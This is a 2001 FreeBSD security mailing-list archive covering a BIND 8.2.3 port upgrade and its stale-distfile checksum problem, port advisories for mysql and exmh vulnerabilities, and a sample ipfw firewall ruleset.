> > > *** Error code 1 > > > > > > > > What ??????????? Why??????????? I updated my ports and tried to install > > > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > > > > installing it, I had a error msgs. (in the up) > > > > please let me know How can I fix it !!! > > > > > > Bind was written on BSD. What's the point of using a port to > > > upgrade it? All FreeBSD's bind port does is increase your chances > > > of errors, reduce your system's overall QA, and install duplicate > > > files in non-standard places. The following steps have worked > > > flawlessly over this and several bind upgrades: > > > > # cd /usr/ports/net/bind8 > > # make PREFIX=/usr install > > > > PREFIX rocks. > > It can't be that simple! I hate to break it to you (I guess?), but it is. I did it on my CURRENT box for testing and it clobbered the old BIND quite nicely. Before, bubbles# ls -l /usr/sbin/named -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named After, bubbles# !ls ls -l /usr/sbin/named -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named Like I said, PREFIX rocks. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:27:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0FDBA37B69E; Tue, 30 Jan 2001 01:25:43 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0U9Phr89218; Tue, 30 Jan 2001 01:25:43 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 30 Jan 2001 01:25:43 -0800 (PST) Message-Id: <200101300925.f0U9Phr89218@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:16.mysql Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:16 Security Advisory FreeBSD, Inc. Topic: mysql may allow remote users to gain increased privileges Category: ports Module: mysql322-server/mysql323-server Announced: 2001-01-29 Credits: Nicolas GREGOIRE Affects: Ports collection prior to the correction date. Corrected: 2001-01-19 Vendor status: Updated version released FreeBSD only: NO I. Background mysql is a high-performance database server. II. Problem Description The mysql323-server port, versions prior to 3.23.22, and all mysql322-server ports contain remote vulerabilities. Due to a buffer overflow, a malicious remote user can cause a denial-of-service by crashing the database. Additionally, the attacker may be able to gain the privileges of the mysqld user, allowing access to all databases and the ability to leverage other local attacks as the mysqld user. In order to accomplish this, the attacker must have a valid mysql account. The mysql322-server and mysql323-server ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 4500 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Malicious remote mysql users may cause a denial-of-service and potentially gain access as the mysqld user, allowing access to all databases on the mysql server and the ability to leverage other local attacks as the mysqld user. If you have not chosen to install the mysql322-server or mysql323-server ports/packages, then your system is not vulnerable to this problem. IV. Workaround Deinstall the mysql322-server or mysql323-server port/package, if you have installed it. V. Solution Note: the mysql322-server port has been removed since mysql 3.23 is now the stable mysql branch. People using older mysql322-server ports/packages are urged to update to the mysql323-server port/package. One of the following: 1) Upgrade your entire ports collection and rebuild the mysql323-server port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/databases/mysql-3.23.32.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/databases/mysql-3.23.32.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/databases/mysql-3.23.32.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the mysql323-server port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXg81UuHi5z0oilAQEIKgP/fLnAPAIJt33PQl6NYnBzivsjX0/w0TGW MVkX3OAz14EZYGEajJJfCf2QboqvDYMMuoYNQS3MF8eTmSNQxpzDpRzFyU8zeiUj UnAzKWk+4vjTRkM8BcQHuXfsuzh/H1KjENjo+gbCrmXitLWjuFSS9l/U91tWeyMM sQevoqqqXQE= =8xko -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:27:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B93E437B4EC; Tue, 30 Jan 2001 01:26:13 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0U9QD589290; Tue, 30 Jan 2001 01:26:13 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 30 Jan 2001 01:26:13 -0800 (PST) Message-Id: <200101300926.f0U9QD589290@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:17.exmh2 Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:17 Security Advisory FreeBSD, Inc. Topic: exmh symlink vulnerability Category: ports Module: exmh2 Announced: 2001-01-29 Credits: Stanley G. Bubrouski Affects: Ports collection prior to the correction date. Corrected: 2001-01-22 Vendor status: Updated version released FreeBSD only: No I. Background exmh is a tcl/tk based interface to the mh mail user agent. II. Problem Description The exmh2 port, versions prior to 2.3.1, contains a local vulnerability: at startup, if exmh detects a problem in its code or configuration an error dialog appears giving the user an option to fill in a bug report and email it to the maintainer. If the user agrees to mail the maintainer a file named /tmp/exmhErrorMsg is created. If the file exists and is a symlink, it will follow the link, allowing local files writable by the user to be overwritten. The exmh2 port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4500 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Malicious local users may cause arbitrary files writable by the user running exmh to be overwritten, in certain restricted situations. If you have not chosen to install the exmh2 port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the exmh2 port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the exmh2 port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/exmh-2.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/exmh-2.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/exmh-2.3.1.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the exmh2 port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXiAVUuHi5z0oilAQFN1QP/Y8TNT5P86VCujRk704GXV9Lxw4W6+lgZ s6wmSPnm8BmO/MZo4RZ+snZToo9lZWEbgU490LU7sUjy8ehMiP6F2OpViuFT76ug INFou7NHIAmMre2iFzyy6pcsLttX0emc02qUiEPDCLXrgF0BvhbqC3myXsbUzrpJ srN7OD3Y8l4= =1966 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:28:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id 94C7237B6A3 for ; Tue, 30 Jan 2001 01:26:40 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id BAA39146; Tue, 30 Jan 2001 01:26:46 -0800 (PST) (envelope-from root@noops.org) Date: Tue, 30 Jan 2001 01:26:46 -0800 (PST) From: Thomas Cannon To: Kris Kennaway Cc: FBSDSecure@aol.com, freebsd-security@FreeBSD.ORG Subject: Re: (no subject) In-Reply-To: <20010130011533.A43910@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > critical IPs are placed in the ignore file. The DNS and email > > servers I did not consider, but they will be added. Thanks for the > > tip. > > "It's too difficult", etc. Firewall policy has a simple rule: Deny all not allowed When setting up something that will auto-ban hosts or networks, you need the opposite of the firewall rule -- namely, to allow tings you don't want banned. Surely you can see where I'm going. It's an obvious conclusion, I'd think. It might be okay for a desktop machine, but nothing more advanced.... Lest I sound like I'm picking on some vendor/writer of code... logcheck rocks. -tcannon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:32:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 3844C37B69C for ; Tue, 30 Jan 2001 01:31:55 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 8C261BA2B4; Tue, 30 Jan 2001 01:32:25 -0800 (PST) Date: Tue, 30 Jan 2001 01:32:25 -0800 From: Kris Kennaway To: security@freeBSD.org Subject: Security advisory SA-01:10.bind Message-ID: <20010130013225.A44140@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OXfL5xGRrasGEqWY" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --OXfL5xGRrasGEqWY Content-Type: text/plain; charset=us-ascii Content-Disposition: inline As you've probably noticed, we got Majordomo fixed (it was configured to filter emails containing the text "automatically generated", which is usually found in those annoying email virus scanner notifications). However, I have decided not to reissue advisory 01:10 which was originally released last week, due to the potential for confusion over the latest BIND vulnerability (which is in fact a different problem altogether) and the fact that the new problem is a more serious one which will require everyone to upgrade anyway. It's still archived on the FTP site and made it to Bugtraq if anyone really wants to read it. Kris --OXfL5xGRrasGEqWY Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6doooWry0BWjoQKURAqGFAKDrQxTv+1fV7wJfwzydAwBBcKZsFQCeLXFH evsv5wzpoCNuEOAnj2Asxxw= =GPee -----END PGP SIGNATURE----- --OXfL5xGRrasGEqWY-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:49:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id 78E1437B69C for ; Tue, 30 Jan 2001 01:48:55 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id JAA02905; Tue, 30 Jan 2001 09:52:44 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Tue, 30 Jan 2001 11:52:14 +0200 (SAST) From: Justin Stanford X-Sender: jus@athena.za.net To: cjclark@alum.mit.edu Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem In-Reply-To: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does your bind8 port actually work? I cvsupped from cvsup.freebsd.org and downloaded the distfiles from ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes patch failure) - so I simply can't get the port to go ahead and compile/install.. - I also tried rm'ing the bind8 directory and freshly cvsupping it - no go. -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions On Tue, 30 Jan 2001, Crist J. Clark wrote: > On Tue, Jan 30, 2001 at 08:12:21PM +1300, Dan Langille wrote: > > On 29 Jan 2001, at 22:59, Crist J. Clark wrote: > > > > > On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote: > > > > Mehmet Hinc wrote: > > > > > Stop in /usr/ports/net/bind8. > > > > > *** Error code 1 > > > > > > > > > > What ??????????? Why??????????? I updated my ports and tried to install > > > > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > > > > > installing it, I had a error msgs. (in the up) > > > > > please let me know How can I fix it !!! > > > > > > > > Bind was written on BSD. What's the point of using a port to > > > > upgrade it? All FreeBSD's bind port does is increase your chances > > > > of errors, reduce your system's overall QA, and install duplicate > > > > files in non-standard places. The following steps have worked > > > > flawlessly over this and several bind upgrades: > > > > > > # cd /usr/ports/net/bind8 > > > # make PREFIX=/usr install > > > > > > PREFIX rocks. > > > > It can't be that simple! > > I hate to break it to you (I guess?), but it is. I did it on my > CURRENT box for testing and it clobbered the old BIND quite nicely. > Before, > > bubbles# ls -l /usr/sbin/named > -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named > > After, > > bubbles# !ls > ls -l /usr/sbin/named > -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named > > Like I said, PREFIX rocks. > -- > Crist J. Clark cjclark@alum.mit.edu > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2: 1: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 642F937B6A4 for ; Tue, 30 Jan 2001 02:00:46 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 14NXac-0007XV-00; Tue, 30 Jan 2001 12:00:42 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id MAA12280; Tue, 30 Jan 2001 12:00:39 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 11836; Tue Jan 30 11:59:10 2001 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.20 #1) id 14NXZ8-0001fz-00; Tue, 30 Jan 2001 11:59:10 +0200 From: Sheldon Hearn To: Pete Fritchman Cc: John Telford , freebsd-security@freebsd.org Subject: Re: IPFW modify the "simple" rule set 4.2 to allow ... In-reply-to: Your message of "Wed, 24 Jan 2001 10:46:31 EST." <20010124104631.B4887@databits.net> Date: Tue, 30 Jan 2001 11:59:10 +0200 Message-ID: <6446.980848750@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 24 Jan 2001 10:46:31 EST, Pete Fritchman wrote: > You'll need to modify /etc/rc.firewall. Look through until you see something > like: This isn't ideal. Rather, allow the system to boot with firewall_type="simple" in /etc/rc.conf. Then use ipfw(8) to show the ruleset in place. Then copy these rules into /etc/firewall.local or whatever. Then set firewall_type="/etc/firewall.local" or whatever. Here's what my /etc/firewall.axl looks like: ------------------------- -f flush add allow ip from any to any via lo0 add deny log ip from any to 127.0.0.0/8 # These two rules save over-use of dynamic rules instantiated by the # 'keep-state' rule at the bottom. # add allow tcp from 172.16.3.5 to 172.16.0.1 domain add allow tcp from 172.16.0.1 domain to 172.16.3.5 add allow tcp from 172.16.0.1 to 172.16.3.5 smtp add allow tcp from 172.16.3.5 smtp to 172.16.0.1 add allow tcp from any to 172.16.3.5 ssh add allow tcp from 172.16.3.5 ssh to any # The next six rules open up enough to allow Samba (NTLM sharing) access # from remote hosts. # add allow udp from 172.16.0.0/15 to 172.16.3.5 137 add allow udp from 172.16.3.5 137 to 172.16.0.0/15 add allow udp from 172.16.0.0/15 to 172.16.3.5 138 add allow udp from 172.16.3.5 138 to 172.16.0.0/15 add allow tcp from 172.16.0.0/15 to 172.16.3.5 139 add allow tcp from 172.16.3.5 139 to 172.16.0.0/15 # This is the rule that allows any kind of OUTBOUND connection to be # established and then used, given the net.inet.ip.fw lifetime values. # add allow all from 172.16.3.5 to any keep-state ------------------------- The '-f flush' allows me to make changes to the file and then reload it using the command "ipfw /etc/firewall.axl" whenever I feel like it, but I think that flushes dynamic rules as well, so use with caution. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:11:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id DFEA937B4E0 for ; Tue, 30 Jan 2001 02:11:30 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 61F9DBA2B4; Tue, 30 Jan 2001 02:12:01 -0800 (PST) Date: Tue, 30 Jan 2001 02:12:01 -0800 From: Kris Kennaway To: Justin Stanford Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130021201.B44770@xor.obsecurity.org> References: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dTy3Mrz/UPE2dbVg" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jus@security.za.net on Tue, Jan 30, 2001 at 11:52:14AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --dTy3Mrz/UPE2dbVg Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 11:52:14AM +0200, Justin Stanford wrote: > Does your bind8 port actually work? >=20 > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > patch failure) - so I simply can't get the port to go ahead and > compile/install.. - I also tried rm'ing the bind8 directory and freshly > cvsupping it - no go. It built when I downloaded it after cvsup on a fresh machine earlier tonight (not the one I built/committed on). Anyone else seeing this? Kris --dTy3Mrz/UPE2dbVg Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpNwWry0BWjoQKURAv3oAJ944VFHSyYh4O5mdXQAVhGwXhQ9rgCg3lJh eo0xIGfmxa5D3LilE+7kc+A= =/5MI -----END PGP SIGNATURE----- --dTy3Mrz/UPE2dbVg-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:12:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 2D38A37B69F for ; Tue, 30 Jan 2001 02:12:40 -0800 (PST) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id f0UACBI33613; Tue, 30 Jan 2001 04:12:11 -0600 (CST) Date: Tue, 30 Jan 2001 04:12:11 -0600 (CST) From: Alex Charalabidis To: Justin Stanford Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jan 2001, Justin Stanford wrote: > Does your bind8 port actually work? > > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > patch failure) - so I simply can't get the port to go ahead and > compile/install.. - I also tried rm'ing the bind8 directory and freshly > cvsupping it - no go. Old ports: >> Attempting to fetch from ftp://ftp.isc.org/isc/bind/src/8.2.2-P7/. 1256951 bytes transferred in 6.4 seconds (190.35 kBps) New with MASTER_SITES commented out: >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. Receiving bind-src.tar.gz (1256951 bytes): 14%C Conclusion: Distfiles have not been updated and ftp.freebsd.org still carries P7. There's your checksum mismatch. Solution: Delete the distfile, let the port fetch it or fetch 8.2.3 yourself from ftp.isc.org. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 System Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:16: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from orhi.sarenet.es (orhi.sarenet.es [192.148.167.5]) by hub.freebsd.org (Postfix) with ESMTP id 3670837B69C for ; Tue, 30 Jan 2001 02:15:52 -0800 (PST) Received: from sarenet.es (borja.sarenet.es [192.148.167.77]) by orhi.sarenet.es (Postfix) with ESMTP id 4692B497D for ; Tue, 30 Jan 2001 11:15:47 +0100 (MET) Message-ID: <3A769455.BBABF4F2@sarenet.es> Date: Tue, 30 Jan 2001 11:15:49 +0100 From: Borja Marcos X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: bind8.2.3 and installation problem References: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> <20010130021201.B44770@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Tue, Jan 30, 2001 at 11:52:14AM +0200, Justin Stanford wrote: > > Does your bind8 port actually work? > > > > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > > patch failure) - so I simply can't get the port to go ahead and > > compile/install.. - I also tried rm'ing the bind8 directory and freshly > > cvsupping it - no go. > > It built when I downloaded it after cvsup on a fresh machine earlier > tonight (not the one I built/committed on). Anyone else seeing this? It seems that the distfiles at ftp.freebsd.org are not updated. I got them from ftp.isc.org and it worked. They don't use to put the version number in the tarballs... Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:16:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 2AB4437B69B for ; Tue, 30 Jan 2001 02:16:03 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id C284EBA2B4; Tue, 30 Jan 2001 02:16:32 -0800 (PST) Date: Tue, 30 Jan 2001 02:16:32 -0800 From: Kris Kennaway To: Kris Kennaway Cc: Justin Stanford , cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130021632.C44770@xor.obsecurity.org> References: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> <20010130021201.B44770@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="VywGB/WGlW4DM4P8" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010130021201.B44770@xor.obsecurity.org>; from kris@obsecurity.org on Tue, Jan 30, 2001 at 02:12:01AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --VywGB/WGlW4DM4P8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 02:12:01AM -0800, Kris Kennaway wrote: > On Tue, Jan 30, 2001 at 11:52:14AM +0200, Justin Stanford wrote: > > Does your bind8 port actually work? > >=20 > > I cvsupped from cvsup.freebsd.org and downloaded the distfiles from > > ftp.freebsd.org and I'm getting checksum mismatches (bypassing causes > > patch failure) - so I simply can't get the port to go ahead and > > compile/install.. - I also tried rm'ing the bind8 directory and freshly > > cvsupping it - no go. >=20 > It built when I downloaded it after cvsup on a fresh machine earlier > tonight (not the one I built/committed on). Anyone else seeing this? I just blew away my port, re-cvs updated it, and re-fetched the distfiles. Everything still looks okay, I'd check whether you're actually up-to-date. Kris --VywGB/WGlW4DM4P8 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpSAWry0BWjoQKURAoLQAJ4+5Sjsln+o7xA7RBV0DC+TGfisgwCgoylw +BQWXB1FO60FRrKYyaiHJnk= =DL2/ -----END PGP SIGNATURE----- --VywGB/WGlW4DM4P8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 2:19:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 9B6AB37B6A5 for ; Tue, 30 Jan 2001 02:18:58 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id E74CDBA2B4; Tue, 30 Jan 2001 02:19:28 -0800 (PST) Date: Tue, 30 Jan 2001 02:19:28 -0800 From: Kris Kennaway To: Alex Charalabidis Cc: Justin Stanford , cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130021928.A47944@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="sdtB3X0nJg68CQEu" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from alex@wnm.net on Tue, Jan 30, 2001 at 04:12:11AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --sdtB3X0nJg68CQEu Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 04:12:11AM -0600, Alex Charalabidis wrote: > >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distf= iles/. > Receiving bind-src.tar.gz (1256951 bytes): 14%C >=20 > Conclusion: Distfiles have not been updated and ftp.freebsd.org > still carries P7. There's your checksum mismatch. Ah yes, if you have old copies of the distfiles in your /usr/ports/distfiles they'll be used instead of fetching new ones, since the filename is the same. Remove them and let the port download fresh ones. rm /usr/ports/distfiles/bind-src.tar.gz /usr/ports/distfiles/bind-doc.tar.gz Kris --sdtB3X0nJg68CQEu Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dpUwWry0BWjoQKURAhMaAKD17vFOmBE5Ok7f6/WuV8f/hEW3XACg8qo/ Y9On6ck7Zptev/glwR7igWc= =U9WZ -----END PGP SIGNATURE----- --sdtB3X0nJg68CQEu-- To Unsubscribe: send mail to majordomo@FreeBSD.org with 